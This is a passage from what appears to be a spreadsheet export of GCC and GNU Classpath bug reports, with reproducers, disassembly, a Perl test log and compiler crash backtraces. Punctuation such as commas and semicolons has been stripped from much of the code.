  0000002C: 55                 push        ebp
  0000002D: 89 E5              mov         ebpesp
  0000002F: 83 EC 18           sub         esp18h
  00000032: E8 00 00 00 00     call        00000037
  00000037: 8D 45 F0           lea         eax[ebp-10h]
  0000003A: 83 C4 F4           add         esp0FFFFFFF4h
  0000003D: 50                 push        eax
  0000003E: E8 BD FF FF FF     call        _ret_test
  00000043: 83 C4 0C           add         esp0Ch
  00000046: 8B 55 F0           mov         edxdword ptr [ebp-10h]
  00000049: 89 D0              mov         eaxedx
  0000004B: EB 03              jmp         00000050
  0000004D: 8D 76 00           lea         esi[esi]
  00000050: 89 EC              mov         espebp
  00000052: 5D                 pop         ebp
  00000053: C3                 ret
  Summary
           0 .bss
           0 .data
          54 .text
--gcc output end--
And this from VC:
--vc output start--
Dump of file test.obj by objdump
File Type: COFF OBJECT
_ret_test:
  00000000: 55                 push        ebp
  00000001: 8B EC              mov         ebpesp
  00000003: 83 EC 0C           sub         esp0Ch
  00000006: C7 45 F4 00 00 00  mov         dword ptr [ebp-0Ch]offset _ret_test
            00
  0000000D: 8B 45 08           mov         eaxdword ptr [ebp+8]
  00000010: 8B 4D F4           mov         ecxdword ptr [ebp-0Ch]
  00000013: 89 08              mov         dword ptr [eax]ecx
  00000015: 8B 55 F8           mov         edxdword ptr [ebp-8]
  00000018: 89 50 04           mov         dword ptr [eax+4]edx
  0000001B: 8B 4D FC           mov         ecxdword ptr [ebp-4]
  0000001E: 89 48 08           mov         dword ptr [eax+8]ecx
  00000021: 8B 45 08           mov         eaxdword ptr [ebp+8]
  00000024: 8B E5              mov         espebp
  00000026: 5D                 pop         ebp
  00000027: C3                 ret
_main:
  00000028: 55                 push        ebp
  00000029: 8B EC              mov         ebpesp
  0000002B: 83 EC 18           sub         esp18h
  0000002E: 8D 45 E8           lea         eax[ebp-18h]
  00000031: 50                 push        eax
  00000032: E8 00 00 00 00     call        00000037
  00000037: 83 C4 04           add         esp4
  0000003A: 8B 08              mov         ecxdword ptr [eax]
  0000003C: 89 4D F4           mov         dword ptr [ebp-0Ch]ecx
  0000003F: 8B 50 04           mov         edxdword ptr [eax+4]
  00000042: 89 55 F8           mov         dword ptr [ebp-8]edx
  00000045: 8B 40 08           mov         eaxdword ptr [eax+8]
  00000048: 89 45 FC           mov         dword ptr [ebp-4]eax
  0000004B: 8B 45 F4           mov         eaxdword ptr [ebp-0Ch]
  0000004E: 8B E5              mov         espebp
  00000050: 5D                 pop         ebp
  00000051: C3                 ret
  Summary
          26 .drectve
          52 .text
--vc output end--
Release:
2.95.3-5 and 3.1
Environment:
- HP Vectra 750mhz. Pentium III PC with 256 MB of memory running Windows 2000 Professional.
- Cygwin 1.3.12 DLL with gcc 2.95.3-5 (and also tried with gcc 3.1 with same result).
How-To-Repeat:
Try to compile the test program above under GCC and Visual C and compare the way the stack is handled in each.</t>
  </si>
  <si>
    <t>cgf</t>
  </si>
  <si>
    <t>GCC-41998</t>
  </si>
  <si>
    <t>GCC 4.6 pending patches meta-bug</t>
  </si>
  <si>
    <t>Collecting pending patches for GCC 4.6 that can be applied after GCC 4.5 branches</t>
  </si>
  <si>
    <t>GCC-5066</t>
  </si>
  <si>
    <t>Perl Tests fails with code for the ultrasparc</t>
  </si>
  <si>
    <t>sh Configure -A define:use64bitint -Duse64bitint=define -Uusemymalloc -Dprefix=/local/lang/perl -Dvendorprefix=/local/lang/perl -Dlibpth=/usr/lib /usr/ccs/lib /local/gnu/gdbm/lib -Dldflags=-L/local/gnu/gdbm/lib -Dcc=gcc -Uuselongdouble -A undef:uselongdouble -Dccflags=-O -mcpu=ultrasparc -mtune=ultrasparc -fno-strict-aliasing -I/local/gnu/gdbm/include
The code for -mcpu=ultrasparc does not pass all the tests with out it does
Release:
3.0.2
Environment:
System: SunOS sysmgtdev.nabaus.com.au 5.7 Generic_106541-17 sun4u sparc SUNWUltra-80
Architecture: sun4
host: sparc-sun-solaris2.7
build: sparc-sun-solaris2.7
target: sparc-sun-solaris2.7
configured with:  : (reconfigured) ./configure --prefix=/local/lang/gcc --with-local-prefix=/local/lang/gcc
How-To-Repeat:
Run make tests and compile with the above
perl-5.6.1
cd t  /usr/bin/ln -s ../perl perl)
if (true /dev/null 2&gt; then \
  cd t  \
else \
  cd t  \
fi
base/cond............ok
base/if..............ok
base/lex.............ok
base/pat.............ok
base/rs..............ok
base/term............ok
comp/bproto..........ok
comp/cmdopt..........ok
comp/colon...........ok
comp/cpp.............ok
comp/decl............ok
comp/multiline.......ok
comp/package.........ok
comp/proto...........ok
comp/redef...........ok
comp/require.........ok
comp/script..........ok
comp/term............ok
comp/use.............ok
cmd/elsif............ok
cmd/for..............ok
cmd/mod..............ok
cmd/subval...........ok
cmd/switch...........ok
cmd/while............ok
run/runenv...........ok
io/argv..............ok
io/dup...............ok
io/fs................ok
io/inplace...........ok
io/iprefix...........ok
io/nargv.............ok
io/open..............ok
io/openpid...........ok
io/pipe..............ok
io/print.............ok
io/read..............ok
io/tell..............ok
op/64bitint..........ok
op/anonsub...........ok
op/append............ok
op/args..............ok
op/arith.............ok
op/array.............ok
op/assignwarn........ok
op/attrs.............ok
op/auto..............ok
op/avhv..............ok
op/bop...............ok
op/chars.............ok
op/chop..............ok
op/closure...........ok
op/cmp...............ok
op/concat............ok
op/cond..............ok
op/context...........ok
op/defins............ok
op/delete............ok
op/die...............ok
op/die_exit..........ok
op/do................ok
op/each..............ok
op/eval..............ok
op/exec..............ok
op/exists_sub........ok
op/exp...............ok
op/fh................ok
op/filetest..........ok
op/flip..............ok
op/fork..............ok
op/glob..............ok
op/goto..............ok
op/goto_xs...........ok
op/grent.............ok
op/grep..............ok
op/groups............ok
op/gv................ok
op/hashwarn..........ok
op/inc...............ok
op/index.............ok
op/int...............ok
op/join..............ok
op/length............ok
op/lex_assign........ok
op/lfs...............skipping test on this platform
op/list..............ok
op/local.............ok
op/lop...............ok
op/magic.............ok
op/method............ok
op/misc..............ok
op/mkdir.............ok
op/my................ok
op/my_stash..........ok
op/nothr5005.........ok
op/numconvert........skipping test on this platform
op/oct...............ok
op/ord...............ok
op/pack..............ok
op/pat...............ok
op/pos...............ok
op/push..............ok
op/pwent.............ok
op/quotemeta.........ok
op/rand..............ok
op/range.............ok
op/read..............ok
op/readdir...........ok
op/recurse...........ok
op/ref...............ok
op/regexp............ok
op/regexp_noamp......ok
op/regmesg...........ok
op/repeat............ok
op/reverse...........ok
op/runlevel..........ok
op/sleep.............ok
op/sort..............ok
op/splice............ok
op/split.............ok
op/sprintf...........ok
op/stat..............ok
op/study.............ok
op/subst.............ok
op/subst_amp.........ok
op/subst_wamp........ok
op/substr............ok
op/sysio.............ok
op/taint.............FAILED at test 147
op/tie...............ok
op/tiearray..........ok
op/tiehandle.........ok
op/time..............ok
op/tr................ok
op/undef.............ok
op/universal.........ok
op/unshift...........ok
op/utf8decode........ok
op/vec...............ok
op/ver...............ok
op/wantarray.........ok
op/write.............ok
pragma/constant......ok
pragma/diagnostics...ok
pragma/locale........ok
pragma/overload......ok
pragma/strict........ok
pragma/sub_lval......ok
pragma/subs..........ok
pragma/utf8..........ok
pragma/warnings......ok
lib/abbrev...........ok
lib/ansicolor........ok
lib/anydbm...........ok
lib/attrs............ok
lib/autoloader.......ok
lib/b................ok
lib/basename.........ok
lib/bigfloat.........ok
lib/bigfltpm.........ok
lib/bigint...........ok
lib/bigintpm.........ok
lib/cgi-esc..........ok
lib/cgi-form.........ok
lib/cgi-function.....ok
lib/cgi-html.........ok
lib/cgi-pretty.......ok
lib/cgi-request......ok
lib/charnames........ok
lib/checktree........ok
lib/class-struct.....ok
lib/complex..........ok
lib/db-btree.........skipping test on this platform
lib/db-hash..........skipping test on this platform
lib/db-recno.........skipping test on this platform
lib/dirhand..........ok
lib/dosglob..........ok
lib/dprof............ok
lib/dumper-ovl.......ok
lib/dumper...........ok
lib/english..........ok
lib/env-array........ok
lib/env..............ok
lib/errno............ok
lib/fatal............ok
lib/fields...........ok
lib/filecache........ok
lib/filecopy.........ok
lib/filefind.........ok
lib/filefunc.........ok
lib/filehand.........ok
lib/filepath.........ok
lib/filespec.........ok
lib/findbin..........ok
lib/ftmp-mktemp......ok
lib/ftmp-posix.......ok
lib/ftmp-security....ok
lib/ftmp-tempfile....ok
lib/gdbm.............ok
lib/getopt...........ok
lib/glob-basic.......ok
lib/glob-case........ok
lib/glob-global......ok
lib/glob-taint.......ok
lib/gol-basic........ok
lib/gol-compat.......ok
lib/gol-linkage......ok
lib/gol-oo...........ok
lib/h2ph.............ok
lib/hostname.........ok
lib/io_const.........ok
lib/io_dir...........ok
lib/io_dup...........ok
lib/io_linenum.......ok
lib/io_multihomed....ok
lib/io_pipe..........ok
lib/io_poll..........ok
lib/io_sel...........ok
lib/io_sock..........ok
lib/io_taint.........ok
lib/io_tell..........ok
lib/io_udp...........ok
lib/io_unix..........ok
lib/io_xs............ok
lib/ipc_sysv.........ok
lib/ndbm.............ok
lib/odbm.............ok
lib/opcode...........ok
lib/open2............ok
lib/open3............ok
lib/ops..............ok
lib/parsewords.......ok
lib/peek.............ok
lib/ph...............ok
lib/posix............ok
lib/safe1............ok
lib/safe2............ok
lib/sdbm.............ok
lib/searchdict.......ok
lib/selectsaver......ok
lib/selfloader.......ok
lib/socket...........ok
lib/soundex..........ok
lib/symbol...........ok
lib/syslfs...........skipping test on this platform
lib/syslog...........ok
lib/textfill.........ok
lib/texttabs.........ok
lib/textwrap.........ok
lib/thr5005..........skipping test on this platform
lib/tie-push.........ok
lib/tie-refhash......ok
lib/tie-splice.......ok
lib/tie-stdarray.....ok
lib/tie-stdhandle....ok
lib/tie-stdpush......ok
lib/tie-substrhash...ok
lib/timelocal........ok
lib/trig.............ok
Failed 1 test script out of 261 99.62% okay.
   ### Since not all tests were successful you may want to run some
   ### of them individually and examine any diagnostic messages they
   ### produce.  See the INSTALL document's section on make test.
   ### If you are testing the compiler then ignore this message 
   ### and run 
   ###      ./perl harness
   ### in the directory ./t.
   ###
   ### Since most tests were successful you have a good chance to
   ### get information with better granularity by running
   ###     ./perl harness 
   ### in directory ./t.
u=0.81  s=0.45  cu=52.98  cs=14.91  scripts=261  tests=11398
make: *** [test] Error 1</t>
  </si>
  <si>
    <t>damon_atkins</t>
  </si>
  <si>
    <t>GCC-78904</t>
  </si>
  <si>
    <t>zero-extracts are not effective</t>
  </si>
  <si>
    <t>Following testcase:
--cut here--
struct S1
{
  char pad1
  unsigned char val
  short pad2
}
struct S1 test (struct S1 a struct S1 b)
{
  struct S1 r = a
  r.val = a.val + b.val
  return r
}
--cut here--
should be compiled to something involving:
addb %dh %ah
but is compiled to a whole sequence of:
        movl    %edi %ecx
        movl    %esi %eax
        xorl    %edx %edx
        movzbl  %ch %esi
        movzbl  %ah %eax
        movb    %dil %dl
        addl    %esi %eax
        xorw    %di %di
        movb    %al %dh
        movzwl  %dx %eax
        orl     %edi %eax
The relevant patterns from i386.md are:
(define_insn addqi_ext_1
  [(set (zero_extract:SI (match_operand 0 ext_register_operand =QQ)
			 (const_int 8)
			 (const_int 8))
	(plus:SI
	  (zero_extract:SI
	    (match_operand 1 ext_register_operand 00)
	    (const_int 8)
	    (const_int 8))
	  (match_operand:QI 2 general_operand QnBn)))
   (clobber (reg:CC FLAGS_REG))]
and
(define_insn *addqi_ext_2
  [(set (zero_extract:SI (match_operand 0 ext_register_operand =Q)
			 (const_int 8)
			 (const_int 8))
	(plus:SI
	  (zero_extract:SI
	    (match_operand 1 ext_register_operand %0)
	    (const_int 8)
	    (const_int 8))
	  (zero_extract:SI
	    (match_operand 2 ext_register_operand Q)
	    (const_int 8)
	    (const_int 8))))
   (clobber (reg:CC FLAGS_REG))]
Combine pass tries to generate something resembling the above patterns:
(set (zero_extract:SI (reg:SI 92 [ D.1804 ])
        (const_int 8 [0x8])
        (const_int 8 [0x8]))
    (subreg:SI (plus:QI (subreg:QI (zero_extract:SI (reg/v:SI 95 [ b ])
                    (const_int 8 [0x8])
                    (const_int 8 [0x8])) 0)
            (reg:QI 98 [ a$val ])) 0))
but it looks that the pattern is not fully canonicalized and thus not recognized.</t>
  </si>
  <si>
    <t>GCC-77500</t>
  </si>
  <si>
    <t>ICE in gfc_trans_omp_atomic at fortran/trans-openmp.c:2822</t>
  </si>
  <si>
    <t>Aborts with ICE down to at least 4.8 :
$ cat z1.f90
program p
   real :: x
!$omp atomic write
   x = f()
!$omp end atomic
end
$ gfortran-7-20160904 -fopenmp z1.f90
z1.f90:3:0:
 !$omp atomic write
internal compiler error: Segmentation fault
0xc2100f crash_signal
        ../../gcc/toplev.c:336
0x78df67 gfc_trans_omp_atomic
        ../../gcc/fortran/trans-openmp.c:2822
0x79b37f gfc_trans_omp_directive(gfc_code*)
        ../../gcc/fortran/trans-openmp.c:4488
0x722987 trans_code
        ../../gcc/fortran/trans.c:1933
0x7517a8 gfc_generate_function_code(gfc_namespace*)
        ../../gcc/fortran/trans-decl.c:6224
0x6dd050 translate_all_program_units
        ../../gcc/fortran/parse.c:5911
0x6dd050 gfc_parse_file()
        ../../gcc/fortran/parse.c:6117
0x71f602 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:198</t>
  </si>
  <si>
    <t>GCC-66790</t>
  </si>
  <si>
    <t>Invalid uninitialized register handling in REE</t>
  </si>
  <si>
    <t>The reproducer I'm about to attach[1] seems to trigger a code generation issue at least on x86_64-linux:
    $ gnatmake -q p -O3 -gnatn
    $ ./p
    raised PROGRAM_ERROR : p.adb:9 explicit raise
The bottom line is that when Success is False in Q.Get (q.adb around line 40) its value is clobbered during return. If we build with -fno-ree we can see in the assembly code (near the return point for q__get) the following sequence:
    movzwl    (%rax) %epb
    ...
somelabel:
    ...
    movzwl    %bp %ebp
    ...
    salq    $16 %rax
    orq    %rbp %rax
However without the -fno-ree switch the instruction:
    movzwl    %bp %ebp
is merged with its definition (the first movzwl instruction) by the REE pass. This is wrong since the definition does _not_ dominate this zero-extension: the first movzwl instruction can be by-passed through somelabel.
I started to investigate this issue: the REE pass is currently not aware of this by-pass code path because it is reached by no proper definition (it brings an uninitialized %rbp register to the zero-extension). This happens in ree.c:get_defs in our case (insn=second movzwl reg=BP) DF_REF_CHAIN contains only one definition: the movzwl instruction.
Given the somelabel code path I would rather expect DF_REF_CHAIN to hold a NULL reference to materialize the lack of initialization in one path. I found the DF_LR_IN/DF_LR_OUT macros from df.h: they provide information about uninitialized variables but the associated comment says they should not be used (This intolerance should eventually be fixed.). Besides they provide a basic-block-level information whereas we are rather interested in instruction-level information in REE.
I was thinking that REE may not be the only optimization pass needing this kind of information but I found no other one so I'm not sure how this ought to be handled. Can anybody confirm my intuition about the NULL reference in DF_REF_CHAIN? I'm willing to implement it but I prefer first to be sure this is the right approach.
Thanks in advance!
[1] It's in Ada. I tried to translate it into C but any change in register allocation makes the issue disappear...</t>
  </si>
  <si>
    <t>derodat</t>
  </si>
  <si>
    <t>GCC-33072</t>
  </si>
  <si>
    <t>use mod only: operator(.sub.) matches any procedure sub</t>
  </si>
  <si>
    <t>Expected: An error that the user operator .sub. does not exist.
Actually: Compiles.
NAG f95:
Error: foo.f90 line 9: Cannot find symbol .SUB. in module A
module a
 implicit none
contains
  subroutine sub()
  end subroutine sub
end module a
program test
use a only: operator(.sub.)
end program test</t>
  </si>
  <si>
    <t>GCC-17133</t>
  </si>
  <si>
    <t>[4.0 Regression] wrong code with -ftree-lim</t>
  </si>
  <si>
    <t>use '-O1' to repeat:
------------------------------------------------------------------------------
extern void abort (void)
int foo = 0
void *bar = 0
unsigned int baz = 100
void *pure_alloc ()
{
  void *res
  while (1)
    {
      res = (void *) ((((unsigned int) (foo + bar))) 
      foo += 2
      if (foo &lt; baz)
	return res
      foo = 0
    }
}
int main ()
{
  pure_alloc ()
  if (!foo)
    abort ()
  return 0
}
------------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-60580</t>
  </si>
  <si>
    <t>aarch64 generates wrong code for __attribute__ ((optimize(no-omit-frame-pointer)))</t>
  </si>
  <si>
    <t>Created attachment 32388
Example C code used i the command lines
We have a piece of code that we compile with -fomit-frame-pointer. The exception is one low-level function that *MUST NOT* rely on the SP register i.e. that one function must be compiled with -fno-omit-frame-pointer. This works fine with the GCC ARM backend i.e. we have in the C code the following function attribute:
 /*
  * This function calls XXX() which modifies SP. This is incompatible to
  * -fomit-frame-pointer generated code as SP is used to access the frame.
  */
 __attribute__ ((optimize(no-omit-frame-pointer)))
 void some_low_level_function(....)
We are now trying to compile that piece of code with the aarch64 backend and get incorrect code that uses SP to access the frame. I tried with the following pre-compiled aarch64 toolchains:
Linaro release 2014.02:
COLLECT_GCC=gcc-linaro-aarch64-linux-gnu-4.8-2014.02_linux/bin/aarch64-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/workarea/stefanb/playground/aarch64/gcc-linaro-aarch64-linux-gnu-4.8-2014.02_linux/bin/../libexec/gcc/aarch64-linux-gnu/4.8.3/lto-wrapper
Target: aarch64-linux-gnu
Configured with: /cbuild/slaves/oorts/crosstool-ng/builds/aarch64-linux-gnu-linux/.build/src/gcc-linaro-4.8-2014.02/configure --build=i686-build_pc-linux-gnu --host=i686-build_pc-linux-gnu --target=aarch64-linux-gnu --prefix=/cbuild/slaves/oorts/crosstool-ng/builds/aarch64-linux-gnu-linux/install --with-sysroot=/cbuild/slaves/oorts/crosstool-ng/builds/aarch64-linux-gnu-linux/install/aarch64-linux-gnu/libc --enable-languages=cc++fortran --disable-multilib --enable-multiarch --with-arch=armv8-a --with-pkgversion='crosstool-NG linaro-1.13.1-4.8-2014.02 - Linaro GCC 2014.02' --with-bugurl=https://bugs.launchpad.net/gcc-linaro --enable-__cxa_atexit --disable-libmudflap --enable-libgomp --disable-libssp --with-gmp=/cbuild/slaves/oorts/crosstool-ng/builds/aarch64-linux-gnu-linux/.build/aarch64-linux-gnu/build/static --with-mpfr=/cbuild/slaves/oorts/crosstool-ng/builds/aarch64-linux-gnu-linux/.build/aarch64-linux-gnu/build/static --with-mpc=/cbuild/slaves/oorts/crosstool-ng/builds/aarch64-linux-gnu-linux/.build/aarch64-linux-gnu/build/static --with-isl=/cbuild/slaves/oorts/crosstool-ng/builds/aarch64-linux-gnu-linux/.build/aarch64-linux-gnu/build/static --with-cloog=/cbuild/slaves/oorts/crosstool-ng/builds/aarch64-linux-gnu-linux/.build/aarch64-linux-gnu/build/static --with-libelf=/cbuild/slaves/oorts/crosstool-ng/builds/aarch64-linux-gnu-linux/.build/aarch64-linux-gnu/build/static --enable-threads=posix --disable-libstdcxx-pch --enable-linker-build-id --enable-plugin --with-local-prefix=/cbuild/slaves/oorts/crosstool-ng/builds/aarch64-linux-gnu-linux/install/aarch64-linux-gnu/libc --enable-c99 --enable-long-long
Thread model: posix
gcc version 4.8.3 20140203 (prerelease) (crosstool-NG linaro-1.13.1-4.8-2014.02 - Linaro GCC 2014.02)
Android AOSP:
COLLECT_GCC=prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.8/bin/aarch64-linux-android-gcc 
COLLECT_LTO_WRAPPER=/workarea/stefanb/repos/tmake-only/prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.8/bin/../libexec/gcc/aarch64-linux-android/4.8/lto-wrapper                               
Target: aarch64-linux-android                                                                       
Configured with: /tmp/AOSP-toolchain/build/../gcc/gcc-4.8/configure --prefix=/tmp/toolchain-build-aarch64-linux-4.8/prefix --target=aarch64-linux-android --host=x86_64-linux-gnu --build=x86_64-linux-gnu --with-gnu-as --with-gnu-ld --enable-languages=cc++ --with-gmp=/tmp/toolchain-build-aarch64-linux-4.8/temp-install --with-mpfr=/tmp/toolchain-build-aarch64-linux-4.8/temp-install --with-mpc=/tmp/toolchain-build-aarch64-linux-4.8/temp-install --with-cloog=/tmp/toolchain-build-aarch64-linux-4.8/temp-install --with-isl=/tmp/toolchain-build-aarch64-linux-4.8/temp-install --with-ppl=/tmp/toolchain-build-aarch64-linux-4.8/temp-install --disable-ppl-version-check --disable-cloog-version-check --disable-isl-version-check --enable-cloog-backend=isl --with-host-libstdcxx='-static-libgcc -Wl-Bstatic-lstdc++-Bdynamic -lm' --disable-libssp --enable-threads --disable-nls --disable-libmudflap --disable-libgomp --disable-libstdc__-v3 --disable-sjlj-exceptions --disable-shared --disable-tls --disable-libitm --enable-initfini-array --disable-nls --prefix=/tmp/toolchain-build-aarch64-linux-4.8/prefix --with-sysroot=/tmp/toolchain-build-aarch64-linux-4.8/prefix/sysroot --with-binutils-version=2.23 --with-mpfr-version=3.1.1 --with-mpc-version=1.0.1 --with-gmp-version=5.0.5 --with-gcc-version=4.8 --with-gdb-version=7.6 --with-gxx-include-dir=/tmp/toolchain-build-aarch64-linux-4.8/prefix/include/c++/4.8 --with-bugurl=http://source.android.com/source/report-bugs.html --disable-bootstrap --disable-libquadmath --enable-plugins --enable-libgomp --disable-libsanitizer --enable-gold --enable-graphite=yes --with-cloog-version=0.18.0 --with-isl-version=0.11.1 --enable-eh-frame-hdr-for-static --disable-gold --disable-libgomp --program-transform-name='s&amp;^&amp;aarch64-linux-android-&amp;'
Thread model: posix
gcc version 4.8 (GCC)
With the attached test.c I get the following assembler code for func2():
Case 1:
aarch64-linux-android-gcc -O0 -march=armv8-a -fno-omit-frame-pointer -S test.c -o -
 func2:
        stp     x29 x30 [sp -32]!
        add     x29 sp 0
        str     wzr [x2916]
        bl      func_no_leaf
        ldp     x29 x30 [sp] 32
        ret
-&gt; Correct code
Case 2:
aarch64-linux-android-gcc -O0 -march=armv8-a -fno-omit-frame-pointer -DINCLUDE_ATTRIBUTE -S test.c -o -
 func2:
        sub     sp sp #32
        str     x30 [sp]
        str     wzr [sp16]
        bl      func_no_leaf
        ldr     x30 [sp]
        add     sp sp 32
        ret
-&gt; WRONG BEHAVIOUR: adding the function attribute to the source code forces the whole module code to be compiled with -fomit-frame-pointer!
Case 3:
aarch64-linux-android-gcc -O0 -march=armv8-a -fomit-frame-pointer -DINCLUDE_ATTRIBUTE -S test.c -o -
 func2:
        sub     sp sp #32
        str     x30 [sp]
        str     wzr [sp16]
        bl      func_no_leaf
        ldr     x30 [sp]
        add     sp sp 32
        ret
-&gt; WRONG BEHAVIOUR: although there is a function attribute for func2() the code looks like case 2 instead of the correct code in case 1
Case 4:
aarch64-linux-android-gcc -O0 -march=armv8-a -fomit-frame-pointer -mno-omit-leaf-frame-pointer -DINCLUDE_ATTRIBUTE -S test.c -o -
 func2:
        stp     x29 x30 [sp -32]!
        add     x29 sp 0
        str     wzr [x2916]
        bl      func_no_leaf
        ldp     x29 x30 [sp] 32
        ret
-&gt; CORRECT: func2() uses frame pointer all other code omits the frame pointer. This is the workaround we currently have to use to get our code to work.</t>
  </si>
  <si>
    <t>GCC-69175</t>
  </si>
  <si>
    <t>[6 Regression] ICE in haifa_luid_for_non_insn at haifa-sched.c:7895</t>
  </si>
  <si>
    <t>trunk r232077 arm-linux-gnueabihf works with -O1
reduced test case:
struct A {
  A *moreRU *lessRU
} a
class B {
  A *mostRU
  A *leastRU
  void m_fn1()
}
void *b
void B::m_fn1() {
  if (b) {
    A *n = (A *)b
    if (b == mostRU)
      if (n == leastRU)
        mostRU = __null
      else
        mostRU-&gt;moreRU = __null
    else
      n-&gt;lessRU-&gt;moreRU = 
    n-&gt;lessRU = mostRU
    if (mostRU == __null)
      mostRU = leastRU = n
    else
      mostRU = n
  }
}
$ g++ -c -g -O2 -march=armv7-a -mfloat-abi=hard -mfpu=vfpv3-d16 -mthumb data.ii
data.ii: In member function 'void B::m_fn1()':
data.ii:26:1: internal compiler error: in haifa_luid_for_non_insn at haifa-sched.c:7895
 }
 ^
0x8600e5 haifa_luid_for_non_insn
        ../../src/gcc/haifa-sched.c:7895
0x864ccb sched_init_insn_luid(rtx_insn*)
        ../../src/gcc/haifa-sched.c:9037
0x8650d3 sched_init_luids(vec)
        ../../src/gcc/haifa-sched.c:9066
0x8652a1 haifa_sched_init()
        ../../src/gcc/haifa-sched.c:7427
0x4a880f schedule_insns()
        ../../src/gcc/sched-rgn.c:3504
0x4a8d6f schedule_insns()
        ../../src/gcc/sched-rgn.c:3498
0x4a8d6f rest_of_handle_sched2
        ../../src/gcc/sched-rgn.c:3737
0x4a8d6f execute
        ../../src/gcc/sched-rgn.c:3873
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.</t>
  </si>
  <si>
    <t>GCC-40816</t>
  </si>
  <si>
    <t>error: 'jvariant::jvariant(jbyte)' cannot be overloaded</t>
  </si>
  <si>
    <t>&gt; I didn't see the original message to which this is replying.
It's about C++ code which contains a function overloaded on jbyte and
jboolean.  This fails with GCJ because they are typedef'ed to the same
type.
&gt; If you can make a test case I'll see if the bug can be fixed.
Compare the table I referenced with these pieces from jni_md.h:
| typedef int    jbyte  __attribute__((__mode__(__QI__)))
| typedef int    jshort __attribute__((__mode__(__HI__)))
| typedef int    jint   __attribute__((__mode__(__SI__)))
| typedef int    jlong  __attribute__((__mode__(__DI__)))
| typedef int    jboolean __attribute__((__mode__(__QI__)))
| typedef unsigned short jchar __attribute__((__mode__(__HI__)))
| typedef float  jfloat
| typedef double jdouble
| typedef jint jsize
| typedef int8_t jbyte
| typedef int16_t jshort
| typedef int32_t jint
| typedef int64_t jlong
| typedef float jfloat
| typedef double jdouble
| typedef jint jsize
| typedef int8_t jboolean
| typedef uint16_t jchar
jboolean is signed but Sun's spec says it should be unsigned.</t>
  </si>
  <si>
    <t>CLASSPATH-22666</t>
  </si>
  <si>
    <t>InflaterInputStream constructor accepts null arguments</t>
  </si>
  <si>
    <t xml:space="preserve">where it should throw a null pointer exception.
attached test case does that on JDK 1.4.1 but fails on gcj 3.2
</t>
  </si>
  <si>
    <t>GCC-34989</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in get_addr_dereference_operands at tree-ssa-operands.c:1698 with IMA</t>
  </si>
  <si>
    <t>/there.pentium4/build_i686/staging_dir/usr/bin/i686-linux-uclibc-gcc -Os -pipe -fno-tree-loop-optimize -fno-tree-dominator-opts -fno-strength-reduce -fno-branch-count-reg -fno-builtin -fstack-protector -fstack-protector-all -mtune=pentium4 -march=pentium4  -Wstack-protector --combine -funit-at-a-time -Wno-error -std=gnu99 -o busybox_unstripped syslogd.i xregcomp.i 
xregcomp.i: In function 'syslogd_main':
xregcomp.i:9926: internal compiler error: in get_addr_dereference_operands at tree-ssa-operands.c:1698
Please submit a full bug report
$ /there.pentium4/build_i686/staging_dir/usr/bin/i686-linux-uclibc-gcc -v
Using built-in specs.
Target: i686-linux-uclibc
Configured with: /there.pentium4/toolchain_build_i686/gcc-4.3.0/configure --prefix=/usr --build=i386-pc-linux-gnu --host=i386-pc-linux-gnu --target=i686-linux-uclibc --enable-languages=cfortran --with-sysroot=/there.pentium4/build_i686/staging_dir --with-build-time-tools=/there.pentium4/build_i686/staging_dir/usr/i686-linux-uclibc/bin --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --enable-shared --with-gmp=/there.pentium4/toolchain_build_i686/gmp --with-mpfr=/there.pentium4/toolchain_build_i686/mpfr --disable-nls --enable-threads --disable-multilib --with-arch=pentium4 --with-tune=pentium4 --disable-libgomp
Thread model: posix
gcc version 4.3.0 20080127 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-70526</t>
  </si>
  <si>
    <t>[5/6 Regression] GCC 6 miscompiles Firefox JIT compiler</t>
  </si>
  <si>
    <t>Created attachment 38175
Reduced testcase
See https://bugzilla.mozilla.org/show_bug.cgi?id=1245783
I managed to reduce it to the attached test case.
$ g++ --version
g++-6 (Ubuntu 6-20160319-0ubuntu11) 6.0.0 20160319 (experimental) [trunk revision 234350]
$ g++-6 -O3 -Wall -o test test.cpp
$ ./test
Fail
It does not print Fail with -O0 or with g++ 5.3.1
The problem seems to be on this line:
    return TypedOrValueRegister(type ToAnyRegister(value))
It looks like we read a bogus/uninitialized value from the stack and use that instead of the result of the ToAnyRegister call.</t>
  </si>
  <si>
    <t>jandemooij+gccbugs</t>
  </si>
  <si>
    <t>GCC-22606</t>
  </si>
  <si>
    <t>Exceptions cannot be thrown from -forward::</t>
  </si>
  <si>
    <t>When @throw'ing form -forward:: method the unwinding will stop at -forward
method with code == _URC_END_OF_STACK in gcc/unwind.inc:_Unwind_RaiseException
This code aborts while throwing. (compiled with -fobjc-exceptions of course)
-----------------------------------------------------------
#import 
#import 
@interface Thrower : Object
- forward: (SEL) s : (arglist_t) a
@end
@implementation Thrower
- forward: (SEL) s : (arglist_t) a
{
        printf(Forwarding %s\n sel_get_name(s))
        @throw [Object new]
}
@end
int
main()
{
        id t = [Thrower new]
        @try
        {
                [t doesnotexist]
        }
        @catch (id error)
        {
                printf(Got error class %s\n [[error class] name])
                [error free]
        }
}
-----------------------------------------------------</t>
  </si>
  <si>
    <t>creep</t>
  </si>
  <si>
    <t>GCC-57198</t>
  </si>
  <si>
    <t>ICE in warn_logical_operator for vectors</t>
  </si>
  <si>
    <t>g++ crashes on the following program:
typedef int vec __attribute__((vector_size(4*sizeof(int))))
void f(vec* a vec* b vec* c){
  *c = (*a &lt; *b) 
}
http://gcc.gnu.org/ml/gcc-patches/2013-04/msg00783.html
includes a fix but it is probably not the right place for that check if we keep this code invalid.</t>
  </si>
  <si>
    <t>GCC-70187</t>
  </si>
  <si>
    <t>[6 Regression] ICE (segfault) in lto1 with -Wsuggest-final-methods/-Wsuggest-final-types</t>
  </si>
  <si>
    <t>Created attachment 37937
testcase (test.ii)
g++ -c -w -r -nostdlib  -O2 -flto input26b.ii
g++ -Ofast -flto -Wsuggest-final-methods -Wsuggest-final-types input26b.o
ICEs with:
lto1: internal compiler error: Segmentation fault
0xa77adf crash_signal
        ../../gcc/toplev.c:335
